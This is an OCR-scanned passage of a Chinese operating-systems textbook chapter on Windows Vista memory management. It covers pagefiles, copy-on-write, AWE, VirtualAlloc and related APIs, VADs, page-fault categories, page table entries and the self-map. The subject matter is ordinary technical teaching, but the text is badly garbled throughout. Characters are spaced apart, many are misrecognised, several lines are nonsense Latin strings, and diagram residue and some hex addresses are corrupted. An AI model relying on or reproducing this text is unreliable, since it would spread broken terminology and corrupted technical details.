创建 一 个 新 线程 时 ， 用 户 态 栈 空间 的 许多 页 保留 于 进程 的 虚拟 地 址 空 
间 ， 仅 有 一 个 页 面 是 提交 的 。 当 栈 增长 时 ， 虚 拟 内 存 管理 器 会 自动 提交 
额外 的 页 面 ， 直 到 保留 页 面 耗 尽 。 保 留 页 面 的 功效 是 : 可 以 保证 栈 不 会 
太 长 而 履 盖 其 他 进程 的 数据 。 保 留 所 有 的 虚拟 页 意味 看 栈 最 终 可 以 达到 
它 的 最 大 尽 寸 ， 而 栈 所 需要 的 连续 虚拟 地 址 空间 的 页 面 ， 也 不 会 有 用 于 
其 他 用 途 的 风险 。 除 了 无 效 、 保 留 、 提 交 状 态 ， 页 面 还 有 其 他 的 属性 : 
可 读 、 可 写 及 可 运行 〈 在 AMD64 兼 容 的 处 理 器 下 ) 。 

















2. 页 面 文件 


关于 后 备 存储 器 的 分 配 有 一 个 有 趣 的 权衡 ， 已 提交 页 面 没 有 被 映射 
于 特定 文件 。 这 些 页 使 用 了 页 面 文件 Cpagefile) 。 问 题 是 该 如 何以 及 
何 时 把 虚拟 页 映射 到 页 面 文件 的 特定 位 置 。 一 个 简单 的 策略 是 : 当 一 个 
页 被 提交 时 ， 为 虚拟 页 分 配 一 个 人 硬盘 上 页 面 文件 中 的 页 。 这 会 确保 对 于 
每 一 个 有 必要 换 出 内 存 的 已 提交 页 ， 都 有 一 个 确定 的 位 置 写 回去 。 











Windows 使 用 一 个 适时 (just-in-time) 策略 。 直 到 需要 被 换 出 内 存 





之 前 ， 在 页 面 文件 中 的 具体 空间 不 会 分 配给 已 提交 的 页 面 。 硬 盘 空 间 当 
然 不 需要 分 配给 永远 不 换 出 的 页 面 。 如 果 总 的 虚拟 内 存 比 可 用 的 物理 内 
存 少 ， 则 根本 不 需要 页 面 文 件 。 这 对 基于 Windows 的 散 入 式 系统 是 很 方 
便 的 。 这 也 是 系统 启动 时 的 方式 ， 因 为 页 面 文件 是 在 第 一 个 用 户 态 进程 
smss.exe 局 动 之 后 才 初 始 化 的 。 











在 预 分 配 策略 下 ， 用 于 私有 数据 《〈 如 栈 、 写 时 复制 代码 页 ) 的 全 部 
虚拟 内 存 受 到 页 面 文件 大 小 的 限制 。 通 过 适时 分 配 的 策略 ， 总 的 虚拟 内 
存 大 小 是 物理 内 存 和 页 面 文件 大 小 的 总 和 。 既 然 相 对 物理 内 存 来 说 硬盘 
足够 大 与 便宜 ， 提 升 性 能 的 需求 自然 比 空间 的 节省 更 重要 。 


有 关 请 求 调 页 ， 需 要 马上 进行 初始 化 从 硬盘 读 取 页 的 请 求 一 一 因为 
在 页 入 〈page-in) 操作 完成 之 前 ， 遇 到 页 面 失效 的 线程 无 法 继续 运行 下 
去 。 对 于 失效 页 面 的 一 个 可 能 的 优化 是 : 在 进行 一 次 IO 操作 时 预 调 入 
一 些 额外 的 页 面 。 然 而 ， 对 于 修改 过 的 页 写 回 磁盘 和 线程 的 执行 一 般 并 
不 是 同步 的 。 对 于 分 配 页 面 文件 空间 的 适时 策略 便 是 利用 这 一 点 ， 在 将 
修改 过 的 页 面 写 入 页 面 文件 时 提升 性 能 : 修改 过 的 页 面 被 集中 到 一 起 ， 
统一 进行 写 入 操作 。 由 于 只 有 妆 页 面 被 写 回 时 页 面 文 件 的 空间 才 真 正 被 
分 配 ， 可 以 通过 排列 使 页 面 文件 中 的 页 面 较为 接近 甚至 连续 ， 来 对 大 批 
写 回 页 面 时 的 寻找 次 数 进行 优化 。 























当 存 储 在 页 面 文件 中 的 页 被 读 取 到 内 存 中 时 ， 直 到 它们 第 一 次 被 修 
改 之 前 ， 这 些 页 面 一 直 保 持 它们 在 页 面 文件 中 的 位 置 。 如 果 一 个 页 面 从 











没 被 修改 过 ， 它 将 会 进入 到 一 个 空闲 物理 页 面 的 列表 中 去 一 一 这 个 表 称 
MERHER (standby list) ， 这 个 表 中 的 页 面 可 以 不 用 写 回 硬盘 而 再 次 
BHA. MRE RIE, APS HS RRO CPE, FAA 
存 将 保留 这 个 页 的 惟一 副本 。 这 是 内 存 管理 器 通过 把 一 个 加 载 后 的 页 标 
识 为 只 读 来 实现 的 。 线 程 第 一 次 试图 写 一 个 页 时 ， 内 存 省 理 占 检测 到 它 
所 处 的 情况 并 释放 页 面 文件 中 的 页 ， 再 授权 写 操作 给 相应 的 页 ， 之 后 让 
线程 再 次 进行 尝试 。 




















Windows 文 持 多 达 16 个 页 面 文件 ， 通 冲 履 盖 到 不 同 的 磁盘 来 达到 较 
高 的 IO 带宽 。 每 一 个 页 面 文件 都 有 初始 的 大 小 和 随后 依 需要 可 以 增长 
到 的 最 大 空间 ， 但 是 在 系统 安装 时 束 创 建 这 些 文 件 达 到 它 的 最 大 值 是 最 
好 的 。 如 果 当 文件 系统 非常 满 却 需 要 增长 页 面 文件 时 ， 页 面 文件 的 新 空 
间 可 能 会 由 多 个 雁 刻 所 组 成 ， 这 会 降低 系统 的 性 能 。 











操作 系统 通过 为 进程 的 私有 页 写 入 映射 信息 到 页 表 入 口 ， 或 与 原 页 
表 入 口 相对 应 的 共 吝 页 的 内 存 区 对 象 ， 来 跟踪 虚拟 页 与 页 面 文件 的 映射 
关系 。 除 了 被 页 面 文件 保留 的 页 面 外 ， 进 程 中 的 许多 页 面 也 被 映射 到 文 
件 系 统 中 的 普通 文件 。 











程序 文件 中 的 可 执行 代码 和 只 读数 据 《〈《 例 如 EXE 或 DLL) 可 以 映射 
到 任何 进程 正在 使 用 的 地 址 空间 。 因 为 这 些 页 面 无 法 被 修改 ， 它 们 从 来 
不 需要 换 出 内 存 ， 然 而 在 页 表 上 映射 全 部 被 标记 为 无 效 后 ， 可 以 立即 重用 
物理 页 面 。 当 一 个 页 面 在 今后 再 次 需要 时 ， 内 存 管理 器 将 从 程序 文件 中 


将 其 读 入 。 


有 时 候 页 面 开始 时 为 只 读 但 最 终 被 修改 。 例 如 ， 当 调试 进程 时 在 代 
码 中 设 定 中 断 点 ， 或 将 代码 重 定向 为 进程 中 不 同 的 地 址 ， 或 对 于 开始 时 
为 共享 的 数据 页 面 进行 修改 。 在 这 些 情况 下 ， 像 大 多 数 现代 操作 系统 一 
样 ，Windows 支 持 写 时 复制 (copy-on-write) 类 型 的 页 面 。 这 些 页 面 开 
始 时 像 普 通 的 被 映射 页 面 一 样 ， 但 如 果 试 图 修改 任何 部 分 页 面 ， 内 存 管 
理 器 将 会 建立 一 份 私有 的 、 可 写 的 副本 。 然 后 它 更 新 虚拟 页 面 的 页 表 ， 
使 之 指向 那个 私有 副本 ， 并 且 使 线程 重新 进行 号 操作 一 一 这 一 次 将 会 成 
功 。 如 果 这 个 副本 之 后 需要 被 换 出 内 存 ， 那 么 它 将 被 写 回 到 页 面 文件 而 
不 是 原始 文件 中 。 











除了 从 EXE 和 DLL 文件 映射 程序 代码 和 数据 ， 一 般 的 文件 都 可 以 映 
财 到 内 存 中 ， 使 得 程序 不 需要 进行 显 式 的 读 写 操作 就 可 以 从 文件 引用 数 
据 。IO 操 作 仍然 是 必要 的 ， 但 它们 由 内 存 管理 器 通过 使 用 内 存 区 对 象 
隐 式 提供 ， 来 表示 内 存 中 的 页 面 和 磁盘 中 的 文件 块 的 映射 。 





内 存 区 对 象 并 不 一 定 和 文件 相关 。 它 们 可 以 和 匿名 内 存 区 域 相关 。 
通过 映射 匿名 内 存 区 对 象 到 多 个 进程 ， 内 存 可 以 在 不 分 配 磁 盘 文 件 的 前 
提 下 共享 。 既然 内 存 区 可 以 在 NT 名 字 空 间 给 予 名 字 ， 进 程 可 以 通过 用 
名 字 打 开 内 存 区 对 象 、 或 者 复制 进程 间 的 内 存 区 对 象 句 柄 的 方式 来 进行 


通信 。 




















3. 大 物理 内 存 寻 址 


多 年 前 ， 当 16 位 〈 或 20 位 ) 的 地 址 空间 还 作为 标准 的 时 候 ， 机 器 已 
有 兆 字 节 的 物理 内 存 ， 人 们 努力 想 出 各 种 技术 使 得 程序 可 以 使 用 更 多 的 
物理 内 存 、 而 不 是 去 适应 有 限 的 地 址 空间 。 这 些 技术 通常 基于 存储 器 组 
转换 (bank switching) ， 使 得 一 个 程序 可 以 突破 16 或 者 20 位 的 限制 ， 蔡 
换 掉 自 己 的 一 些 内 存 块 。 在 刚 引入 32 位 计算 机 时 ， 大 多 数 桌面 计算 机 只 
有 几 个 兆 的 物理 内 存 。 然 而 随 着 内 存在 集成 电路 上 变 得 更 加 密集 ， 可 用 
内 存 开始 迅速 增长 。 这 推动 了 服务 器 的 发 展 ， 因 为 服务 器 上 的 应 用 程序 
往往 需要 更 多 的 内 存 。 英 特 尔 的 Xeon 芯 片 支持 物理 地 址 扩展 (PAE) ， 
物理 内 存 寻 址 空间 从 32 位 变 为 36 位 ， 意 味 着 一 个 单一 的 系统 可 以 支持 高 
达 64GB 的 物理 内 存 。 这 远 远 大 于 2G 或 者 3G 一 一 单个 进程 可 以 在 32 位 的 
用 户 模式 寻 址 的 虚拟 地 址 空间 ， 然 而 一 些 像 SQL 数据 库 这 样 的 大 型 应 用 
软件 恰恰 被 设计 为 运行 在 一 个 单个 进程 的 寻 址 空间 中 ， 因 此 存储 器 组 转 
换 已 经 过 时 了 ， 取 代 它 的 是 地 址 窗口 扩展 (Address Windowing 
Extensions, AWE) 。 这 种 机 制 允 许 程序 〈 以 正确 的 特权 级 运行 ) 去 请 
求 物理 内 存 的 分 配 。 进 程 可 以 保留 所 需 的 虚拟 地 址 ， 并 请 求 操作 系统 进 
行 虚拟 地 址 与 物理 地 址 间 的 映射 。 在 所 有 的 服务 器 应 用 64 位 寻 址 方式 


ye 


前 ，AWE 一 直 充 当权 宜 之 计 的 角色 。 


























11.5.2 “内存 管 理 系统 调用 


Win32 API 包 含 了 大 量 的 函数 来 文 持 一 个 进程 显 式 地 管理 它 目 己 的 
虚拟 内 存 ， 其 中 最 重要 的 函数 如 图 11-31 所 示 。 它 们 都 是 在 包含 一 个 单 
独 的 页 或 一 个 由 两 个 或 多 个 在 虚拟 地 址 空间 中 连续 页 的 序列 的 区 域 上 进 
行 操作 的 。 


前 四 个 API 函 数 是 用 来 分 配 、 和 释放、 保护 和 查询 虚拟 地 址 空间 中 的 
区 域 的 。 被 分 配 的 区 域 总 是 从 64KB 的 边界 开始 ， 以 尽量 减少 移植 到 将 
来 的 体系 结构 的 问题 (因为 将 来 的 体系 结构 可 能 使 用 比 当前 使 用 的 页 更 
大 的 页 ) 。 实 际 分 配 的 地 址 空间 可 以 小 于 64KB， 但 是 必须 是 一 个 页 大 
小 的 整数 倍 。 接 下 来 的 两 个 API 给 一 个 进程 把 页 面 固定 到 内 存 中 以 防止 
它们 被 蔡 换 到 外 存 以 及 撤销 这 一 性 质 的 功能 。 举 例 来 说， 一 个 实时 程序 
可 能 需要 它 的 页 面具 有 这 样 的 性 质 以 防止 在 关键 操作 上 发 生 页 面 失效 。 
操作 系统 强加 了 一 个 限制 来 防止 一 个 进程 过 于 “ 贪 焚 ”: 这些 页 面 能 够 移 
出 内 存 ， 但 是 仅仅 在 整个 进程 被 蔡 换 出 内 存 的 时 候 才能 这 么 做 。 当 该 进 
程 被 重新 装 入 内 存 时 ， 所 有 之 前 被 指定 固定 到 内 存 中 的 页 面 会 在 任何 线 
程 开 始 运行 之 前 被 重新 装 入 内 存 。 尽 管 没 有 从 图 11-31 中 体现 出 来 ， 
Windows Vista 还 包含 一 些 原 生 API 函 数 来 允许 一 个 进程 访问 其 他 进程 的 
虚拟 内 存 。 前 提 是 该 进程 被 给 予 了 控制 权 ， 即 它 拥有 一 个 相应 的 句柄 。 




















Win32 API 函数 

VirtualAlloc 保留 或 提交 一 个 区 域 

VirtualFree 释放 或 解除 提交 一 个 区 域 

VirtualProtect 改变 在 一 个 区 域 上 的 读 / 写 /执行 保护 
VirtualQuery 查询 一 个 区 域 的 状态 

VirtualLock 使 一 个 区 域 党 驻 内 存 〈( 即 不 允许 被 蔡 换 到 外 存 ) 


VirtualUnlock 使 一 个 区 域 以 正常 的 方式 参与 页 和 面 蔡 换 策略 
CreateFileMapping 创建 一 个 文件 映射 对 象 并 且 可 以 选择 是 否 赋予 该 对 象 一 个 名 了 字 
MapViewOfFile 映射 一 个 文件 (或 一 个 文件 的 一 个 部 分 〉 到 地 址 空间 中 
UnmapViewOfFile 从 地 址 空间 中 删除 一 个 被 映射 的 文件 

OpenFileMapping 打开 一 个 之 前 创建 的 文件 映射 对 象 





图 11-31 Windows 中 用 来 管理 虚拟 内 存 的 主要 的 Win32 APL% BK 


列 出 的 最 后 四 个 API 函 数 是 用 来 管理 内 存 映射 文件 的 。 为 了 映射 一 
个 文件 ， 首 先 必须 通过 调用 CreateFileMapping 来 创建 一 个 文件 映射 对 象 
〈 见 图 11-23) 。 这 个 函数 返回 一 个 文件 映射 对 象 〈 即 一 个 内 存 区 对 
象 ) 的 句柄 ， 并 且 可 以 选择 是 否 为 该 操作 添加 一 个 名 字 到 Win32 地 址 空 
间 中 ， 从 而 其 他 的 进程 也 能 够 使 用 它 。 接 下 来 的 两 个 函数 从 一 个 进程 的 
虚拟 地 址 空间 中 映射 或 取消 映射 内 存 区 对 象 之 上 的 视图 。 最 后 一 个 APIT 
能 被 一 个 进程 用 来 映射 其 他 进程 通过 调用 CreateFileMapping 创 建 并 共享 
出 来 的 映射 ， 这 样 的 映射 通常 是 为 了 映射 匿名 内 存 而 建立 的 。 通 过 这 样 
的 方式 ， 两 个 或 多 个 进程 能 够 共享 它们 地 址 空间 中 的 区 域 。 这 一 技术 允 
许 它们 写 内 容 到 相互 的 虚拟 内 存 的 受 限 的 区 域 中 。 





11.5.3 ”存储 管理 的 实现 


运行 在 x86 处 理 器 上 的 Windows Vista 操 作 系 统 为 每 个 进程 都 单独 提 
供 了 一 个 4GB 大 小 的 按 需 分 页 (demand-paged) 的 线性 地 址 空间 ， 不 支 
持 任 何 形式 的 分 段 。 从 理论 上 说 ， 页 面 的 大 小 可 以 是 不 超过 64KB 的 2 的 
任何 次 款 。 但 是 在 Pentium 处 理 器 上 ， 页 面 正 常情 况 下 固定 地 设置 成 
4KB 大 小 。 另 外 ， 操 作 系 统 可 以 使 用 4MB 的 页 来 改进 处 理 器 存储 管理 单 
元 中 的 快 表 (Translation Lookaside Buffer, TLB) 的 效率 。 内 核 以 及 大 
型 应 用 程序 使 用 了 4MB 大 小 的 页 面 以 后 ， 可 以 显著 地 提高 性 能 。 这 是 因 
为 快 表 的 命中 率 提高 了 ， 并 且 访 问 页 表 以 寻找 在 快 表 中 没有 找到 的 表 项 
的 次 数 减少 了 。 











调度 器 选择 单个 线程 来 运行 而 不 太 关 心 进程 ， 存 储 管理 器 则 不 同 ， 
它 完全 是 在 处 理 进 程 而 不 太 关心 线程 。 毕 竟 ， 是 进程 而 非 线程 拥有 地 址 
空间 ， 而 地 址 空间 正 是 存储 管理 器 所 关心 的 。 当 虚拟 地 址 空间 中 的 一 片 
区 域 被 分 配 之 后 ， 就 像 图 11-32 中 进程 A 被 分 配 了 4 片区 域 那样 ， 存 储 管 
理 器 会 为 它 创 建 一 个 虚拟 地 址 描述 符 (Virtual Address Descriptor, 
VAD) 。VAD 列 出 了 被 映射 地 址 的 范围 ， 用 来 表示 作为 后 备 存储 的 文 
件 以 及 文件 被 映射 区 域 起 始 位 置 的 节 区 以 及 权限 。 当 访问 第 一 个 页 面 的 
时 候 ， 创 建 一 个 页 目录 并 且 把 它 的 物理 地 址 插入 进程 对 象 中 。 一 个 地 址 
空间 被 一 个 VAD 的 列表 所 完全 定义 。VAD 被 组 织 成 平衡 树 的 形式 ， 从 











而 保证 一 个 特定 地 址 的 描述 符 能 够 个 快 速 地 找到 。 这 个 方案 支持 稀 玖 的 
地 址 空间 。 被 映射 的 区 域 之 间 未 使 用 的 地 址 空间 不 会 使 用 任何 内 存 中 或 
磁盘 上 的 资源 ， 从 这 个 意义 上 说 ， 它 们 是 “免费 ”的 。 


磁盘 上 的 后 备 存 储 





页 面 文件 
Bn lib/dll ~~~ ~~ 
progl.exe prog2.exe 


图 11-32 被 映射 的 区 域 以 及 它们 在 磁盘 上 的 “影子 ”页 面 。lib.dll 文 
件 被 同时 映射 到 两 个 地 址 空间 中 


1. 页 面 失效 处 理 





当 在 Windows Vista 上 启动 一 个 进程 的 时 候 ， 很 多 映射 了 程序 的 EXE 
和 DLL 映 像 文 件 的 页 面 可 能 已 经 在 内 存 中 ， 这 是 因为 它们 可 能 被 其 他 进 








ee ee 
它们 能 一 直 被 共有 部 ， 直 到 内 容 要 被 修改 的 那 一 刻 。 如 果 操 作 系统 从 一 次 
过 去 的 执行 中 认 出 了 这 个 EXE， 它 可 能 已 经 通过 使 用 微软 称 之 为 超级 预 
ERX (SuperFetch) 的 技术 记录 了 页 面 引 用 的 模式 。 超 级 预 读 取 技 术 答 
试 预先 读 入 很 多 需要 的 页 面 到 内 存 中 ， 尽 管 进程 尚未 在 这 些 页 面 上 发 生 
页 面 失效 。 这 一 撤 术 通过 重 登 从 磁盘 上 读 入 页 面 和 执行 映像 中 的 初始 化 
代码 ， 减 小 了 局 动 应 用 程序 所 需 的 延 时 。 同 时 ， 和 它 改进 了 磁盘 的 吞吐 
量 ， 因 为 使 用 了 超级 预 读 取 技 术 以 后 ， 磁 盘 驱 动 硕 能 够 更 轻易 地 组 织 对 
磁盘 的 读 请 求 来 减少 所 怖 的 寻 道 时 间 。 进 程 预约 式 页 面 调度 
(prepaging) 技术 也 用 到 了 系统 局 动 、 把 后 全 应 用 程序 移 到 前 人 台 以 及 休 
眠 之 后 重 局 系统 当中 。 

















存储 管理 器 支持 预约 式 页 面 调度 ， 但 是 它 被 实现 成 系统 中 一 个 单独 
的 组 件 。 和 被 读 入 到 内 存 的 页 面 不 是 插入 到 进程 的 页 表 中 ， 而 是 插入 到 后 
备 列 表 中 ， 从 而 使 得 在 需要 时 可 以 不 访问 磁盘 就 将 它们 插入 到 进程 中 。 








未 被 映射 的 页 面 稍微 有 些 不 同 。 它 们 没有 被 通过 读 取 文件 来 初始 
化 。 相 反 ， 一 个 未 被 映 册 的 页 面 第 一 次 被 访问 的 时 候 ， 存 储 定理 器 会 所 
供 一 个 新 的 物理 页 面 ， 该 页 面 的 内 容 被 事先 清 零 〈 为 了 安全 方面 的 原 
KD 。 在 后 续 的 页 面 失效 处 理 过 程 中 ， 未 被 映射 的 页 面 可 能 会 被 从 内 存 
中 找到 ， 人 否则 的 话 ， 它 们 必须 被 从 页 面 文件 中 重新 读 入 内 存 。 














存储 管理 器 中 的 按 需 分 页 是 通过 页 面 失 效 来 驱动 的 。 在 每 次 页 面 失 


效 发 生 的 时 候 ， 会 发 生 一 次 到 内 核 的 陷入 。 内 核 将 建立 一 个 说 明 发 生 了 
什么 事情 的 机 器 无 关 的 描述 符 ， 并 把 该 描述 符 传 递 给 存储 管理 器 相关 的 
执行 部 件 。 存 储 管理 器 接 下 来 会 检查 引发 页 面 失效 的 内 存 访问 的 有 效 
性 。 如 果 发 生 页 面 失效 的 页 面 位 于 一 个 已 提交 的 区 域内 ， 存 储 管 理 器 将 
在 VAD 列 表 中 查找 页 面 地 址 并 找到 或 创建 》 进 程 页 表 项 。 对 于 共享 页 
面 的 情况 ， 存 储 管理 费 使 用 与 内 存 区 对 象 关联 的 原始 页 表 项 来 填写 进程 
页 表 中 的 新 页 表 项 。 








不 同 处 理 器 体系 结构 下 的 页 表 项 的 格式 可 能 会 不 同 。 对 于 x86 和 
x64， 一 个 被 映射 页 面 的 页 表 项 如 图 11-33 所 示 。 如 果 一 个 页 表 项 被 标记 
为 有 效 ， 它 的 内 容 会 被 硬件 读 取 并 解释 ， 从 而 虚拟 地 址 能 够 转换 成 正确 
的 物理 地 址 。 未 被 映射 的 页 面 也 有 对 应 的 页 表 项 ， 但 是 这 些 页 表 项 被 标 
记 成 无 效 ， 硬 件 将 忽略 这 些 页 表 项 除 该 标记 之 外 的 部 分 。 页 表 项 的 软件 
格式 与 便 件 格式 有 所 不 同 ， 软 件 格式 由 存储 管理 需 决 定 。 例 如 ， 对 于 一 
个 未 映射 的 页 面 ， 它 必须 在 使 用 前 分 配 和 清 零 ， 这 一 点 可 以 通过 页 表 项 
来 表明 。 








页 表 项 中 有 两 个 重要 的 位 是 直接 由 硬件 更 新 的 ， 它 们 是 访问 位 
Caccess bit) 和 脏 位 (dirty bit) 。 这 两 个 位 跟踪 了 什么 时 候 一 个 特定 的 
页 面 映 射 用 来 访问 该 页 面 以 及 这 个 访问 是 否 以 写 的 方式 修改 了 页 面 的 内 
容 。 这 确实 很 有 助 于 提高 系统 性 能 。 因 为 存储 管理 器 可 以 使 用 访问 位 来 
实现 LRU (Least-Recently Used， 最 近 最 少 使 用 ) 类 型 的 页 面 蔡 换 策 


略 。LRU 原 理 是 ， 那 些 最 长 时 间 没有 被 使 用 过 的 页 面 有 最 小 的 可 能 性 在 
不 久 的 将 来 被 再 次 使 用 。 访 问 位 使 存储 管理 器 知 道 一 个 页 面 家 访问 过 
了 ， 脏 位 使 存储 管理 器 知道 一 个 页 面 家 修改 了 ， 或 者 更 重要 的 是 ， 一 个 
页 面 没 有 被 修改 。 如 果 一 个 页 面目 从 从 磁盘 上 读 到 内 存 后 没有 被 修改 
过 ， 存 储 管理 器 就 没有 必要 在 将 该 页 面 用 到 其 他 地 方 之 前 将 页 面 内 容 写 
回 磁 盘 了 。 








正如 表 11-33 所 示 ，x86 体 系 结构 通常 使 用 32 位 大 小 的 页 表 项 ， 而 
x64 体 系 结构 使 用 64 位 大 小 的 页 表 项 。 在 域 上 面 的 唯一 区 别 是 x64 的 物理 
页 号 域 是 30 位 ， 而 不 是 20 位 。 然 而 ， 现 今 存在 的 任何 x64 处 理 器 所 支持 
的 物理 页 面 的 数量 都 要 远 小 于 x64 体 系 结构 所 能 表示 的 数量 。x86 体 系 结 
构 也 支持 一 种 特殊 的 物理 地 址 扩展 (Physical Address Extension, 

PAE) 。PAE 模 式 允 许 处 理 器 访问 超过 4GB 的 物理 内 存 ， 附 加 的 物理 页 
框 位 要 求 PAE 模 式 下 的 页 表 项 也 是 64 位 。 











31 让 下 二 





63 62 52 51 人 





NX — No eXecute PCD - Page Cache Disable 
AVL - AVaiLable to the OS PWT - Page Write-Through 
G — Global page U/S - User/Supervisor 
PAT — Page Attribute Table R/W — Read/Write access 
D — Dirty (modified) P — Present (valid) 
A — Accessed (referenced) 

a) b) 


图 11-33 ”一 个 a)Intel x8644 A 2544 Feb) AMD x64 体 系 结构 上 的 已 映射 页 
面 的 页 表 项 (PTE) 


每 个 页 面 失效 都 可 以 归 入 以 下 五 类 中 的 一 
1) 所 引用 的 页 面 没 有 提交 


2) 和 尝试 违 反 权限 的 页 面 访问 。 





3) 修 改 一 个 共 译 的 写 时 复制 页 面 。 


4) 需 要 扩大 栈 。 





5) 所 引用 的 页 已 经 提交 但 是 当前 没有 了 映射。 





第 一 种 和 第 二 种 情况 是 由 于 编程 错误 引起 。 如 果 一 个 程序 试图 使 用 
一 个 没有 一 个 有 效 映 射 的 地 址 或 试图 进行 一 个 称 为 访问 违例 Caccess 
violation) 的 无 效 操作 (例如 试图 写 一 个 只 读 的 页 面 )， 通 常 的 结果 
是 ， 这 个 进程 会 被 终止 。 访 问 破 坏 的 原因 通常 是 坏 指针 ， 包 括 访问 从 进 
程 释放 的 和 被 解除 映射 的 内 存 。 


第 三 种 情况 与 第 二 种 情况 有 相同 的 症状 (试图 写 一 个 只 读 的 页 
面 ) ， 但 是 处 理 方式 是 不 一 样 的 。 因 为 页 面 已 经 标记 为 写 时 复制 ， 存 储 
管理 需 不 会 报告 访问 违例 ， 相 反 它 会 为 当前 进程 产生 一 个 该 页 面 的 私有 
副本 ， 然 后 返回 到 试图 写 该 页 面 的 线程 。 该 线程 将 重 试 写 操作 ， 而 这 次 
的 写 操 作 将 会 成 功 完成 而 不 会 引发 页 面 失效 。 











第 四 种 情况 在 线程 同 栈 中 压 入 一 个 值 ， 而 这 个 值 会 被 写 到 一 个 还 没 
有 被 分 配 的 页 面 的 情况 下 发 生 。 存 储 管理 需 程 序 能 够 识别 这 种 特殊 情 
况 。 只 要 为 栈 保留 的 虚拟 页 面 还 有 空间 ， 存 储 管理 器 就 会 提供 一 个 新 的 
物理 页 面 ， 将 该 页 面 清 零 ， 最 后 把 该 页 面 映射 到 进程 地 址 空间 。 线 程 在 
恢复 执行 的 时 候 会 重 试 上 次 引 肥 页 面 失效 的 内 存 访问 ， 而 这 次 该 访问 会 
成 功 。 








最 后 ， 第 五 种 情况 就 是 常见 的 页 面 失 效 。 这 种 异常 包含 下 述 几 种 情 
况 。 如 采访 页 是 由 文件 映射 的 ， 内 存 管 理 器 必须 查找 该 页 与 内 存 区 对 象 
结合 在 一 起 的 原型 页 表 等 类 似 的 数据 结构 ， 从 而 保证 在 内 存 中 不 存在 该 
页 的 副本 。 如 果 该 页 的 副本 已 经 在 内 存 中 ， 即 在 男 一 个 进程 的 页 面 链表 








已经 存在 该 页 面 的 副本 ,或 者 在 后 备 、 已 修改 页 链表 中 ， 则 只 需要 共有 至 
该 页 即 可 。 否 则 ， 内 存 管理 器 分 配 一 个 空 几 的 物理 页 面 ， 并 安排 从 磁盘 
复制 文件 页 。 








如 果 内 存 管 理 需 能 够 从 内 存 中 找到 需要 的 页 而 不 是 去 磁盘 查找 从 而 
响应 页 面 失效 ， 则 称 为 软 异 常 (soft fault) 。 如 果 需 要 从 磁盘 进行 复 
Hill, WAR ARSE Chard fault〉。 软 寞 第 同 硬 寞 和 党 相 比 开销 更 小 ， 对 于 
应 用 程序 性 能 的 影响 很 小 。 软 异常 出 现在 下 面 场景 中 ; 一 个 共享 的 页 已 
经 映射 到 另 一 个 进程 ;请求 一 个 新 的 全 零 页 ， 或 所 需 页 面 已 经 从 进程 的 
工作 集 移 除 ， 但 是 还 没有 重用 。 








当 一 个 物理 页 面 不 再 映射 到 任何 进程 的 页 表 ， 将 进入 以 下 三 种 状态 
之 一 : 空 尊 、 修 改 或 后 备 。 内 存 管理 器 会 立刻 释放 类 似 那些 已 结束 进程 
的 栈 页 面 这 样 不 再 会 使 用 的 页 面 。 根 据 判 断 映射 页 面 的 页 表 项 中 的 上 次 
从 磁盘 读 出 后 的 脏 位 是 否 设 置 ， 页 面 可 能 会 再 次 发 生 弄 毅 ， 从 而 进入 已 
修改 链表 或 者 后 备 链表 (standby list) 。 已 修改 链表 中 的 页 面 最 终 会 写 
回 磁盘 ， 然 后 移 到 后 备 链表 中 。 





内 存 管理 器 可 以 根据 需要 从 空闲 链表 或 者 后 备 链表 中 分 配 页 面 。 
在 分 配 页 面 并 从 磁盘 复制 之 前 ， 总 是 在 已 修改 链表 和 后 备 链表 中 检查 该 
页 面 是 否 已 经 在 内 存 中 。Windows Vista 中 的 预约 式 调 页 机 制 通过 读 入 那 
些 未 来 可 能 会 用 到 的 页 面 并 把 它们 插入 后 备 链 表 的 方式 将 硬 异 常 转化 为 
软 异 常 。 内 存 管 理 器 通过 读 入 成 组 的 连续 页 面 而 不 是 仅仅 一 个 页 面 来 进 

















行 一 定数 量 的 普通 预约 式 调 页 。 多 余 调 入 的 页 面 立 刻 插 入 后 备 链 表 。 而 
由 于 内 存 管理 器 的 开销 主要 是 进行 1O 操 作 引 起 的 ， 因 而 预约 式 调 页 并 
不 会 带 来 很 大 的 浪费 。 与 谈 入 一 秘 页 面相 比 ， 仪 读 入 一 个 页 面 的 额外 开 
销 是 可 以 忽略 的 。 








图 11-33 中 的 页 表 项 指 的 是 物理 页 号 ， 而 不 是 虚拟 页 号 。 为 了 更 新 
页 表 《〈 以 及 页 目录 ) 项 ， 内 核 需 要 使 用 虚拟 地 址 。Windows 使 用 如 图 11- 
34 所 示 的 页 目录 表 项 中 的 自 映射 (self-map〉 表 项 将 当前 进程 的 页 表 和 和 
页 目录 映射 到 内 核 虚拟 地 址 空间 。 通 过 映射 页 目录 项 到 页 目录 〈( 自 映 
射 ) ， 就 具有 了 能 用 来 指向 页 目录 项 《图 11-34a) 和 页 表 项 《〈 图 11- 
34b) 的 虚拟 地 址 。 每 个 进程 的 自 映射 占用 4MB 内 核 地 址 空间 (x86 
E) 。 科 和 运 的 是 ， 该 4MB 地 址 空间 是 同样 一 块 地 址 空间 。 














虚拟 


虚拟 
1100 0000 00 11 0000 0000 1100 0000 00 00 1100 0000 00 11 1001 0000 1100 1000 01 00 
地 址 [1100000000 1100000000 110000000000] jh 让 


c0300c00 c0390c84 
a) b) 






Self-map: PD[0xc0300000>>22] is PD (page-directory) 
Virtual address (a): (PTE *)(0xc0300c00) points to PD[0x300] which is the self-map page directory entry 
Virtual address (b): (PTE *)(Oxc0390c84) points to PTE for virtual address 0xe4321000 





图 11-34 x86 上 ，Windows 用 来 映射 页 表 和 页 目录 的 物理 页 面 到 内 核 
虚拟 地 址 的 自 映射 表 项 


2. 页 面 置换 算法 





当空 闲 物理 页 面 数量 降 得 较 低 时 ， 内 存 管理 器 开始 从 内 核 态 的 系统 
进程 以 及 用 户 态 进程 移 走 页 面 。 目 标 就 是 使 得 最 重要 的 虚拟 页 面 在 内 存 
中 ， 而 其 他 的 在 磁盘 上 。 决 定 什 么 是 重要 的 需要 技巧 。Windows 通 过 大 
量 使 用 工作 集 来 解决 这 一 问题 。 工 作 集 处 在 内 存 中 ， 不 需要 通过 页 面 失 
效 即 可 使 用 的 映射 入 内 存 的 页 面 。 当 然 ， 工 作 集 的 大 小 和 构成 随 着 从 属 
于 进程 的 线程 运行 来 回 变动 。 


























每 个 进程 的 工作 集 由 两 个 参数 描述 : 最 小 值 和 最 大 值 。 这 两 个 参数 








并 不 是 硬性 边界 ， 因 而 一 个 进程 在 内 存 中 可 能 具有 比 它 的 工作 集 最 小 值 
